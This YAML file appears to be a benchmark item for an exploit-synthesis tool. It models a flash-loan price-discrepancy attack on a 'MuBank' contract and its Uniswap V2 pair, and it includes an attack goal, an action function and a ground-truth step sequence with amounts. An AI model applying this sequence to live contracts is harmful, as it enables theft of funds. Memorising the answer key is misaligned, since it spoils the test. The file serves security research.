project_name: "MUMUG"

ctrt_name_mapping:
  "mubank": "MuBank"
  "mu": "Mu"
  "usdce": "USDCE"
  "pair": "UniswapV2Pair"
  "factory": "UniswapV2Factory"
  "router": "UniswapV2Router"

tokens:
  - "mu"
  - "usdce"

token_users:
  - "mubank"
  - "pair"

uniswap_mapping:
  "pair": ["usdce", "mu"]

actions:
  - "function swap_mubank_usdce_mu(uint256 sendAmount) internal {
    usdce.approve(address(mubank), type(uint).max);
    mubank.mu_bond(address(usdce), sendAmount);
    }"

# For contract deployment
deployments:
  - ["mu", "new Mu(totalSupplymu)"]
  - ["usdce", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - ["mubank", "new MuBank(address(router), address(pair), address(mu))"]

# For extra deployment after the contract deployment
extra_deployments: []

attack_goal:
  "usdce.balanceOf(attacker) >= 10e6"

groundtruth:
  - ["borrow_mu", "99000 ether"]
  - ["swap_pair_mu_usdce", "99000 ether"]
  - ["swap_mubank_usdce_mu", "22960 ether"]
  - ["nop", "0"]
  - ["nop", "0"]
  - ["payback_mu", "99300 ether"]

# Constraints for flashLoan payback
constraints:
  - "amt5 == amt0 + 300 ether"


# Extra Information
roles:
  "usdce":
    is_asset: true
    is_stablecoin: true
  "mu":
    is_asset: true
    is_stablecoin: false
  "mubank":
    is_swappair: true
    support_swaps:
      "usdce": ["mu", "usdce"]
  "pair":
    is_swappair: true
    support_swaps:
      "mu": ["mu", "usdce"]
      "usdce": ["mu", "usdce"]
  
pattern:
  "Price Discrepancy"

total_amt:
  6

# Not used currently
contract_names_mapping:
  "UniswapV1.token": "ERC20Basic"
  "UniswapV1.weth": "WETH"
  "PuppetPool.token": "ERC20Basic"
  "PuppetPool.weth": "WETH"
  "PuppetPool.uniswap": "UniswapV1"
attack_state_variables:
  - "WETH.balances"
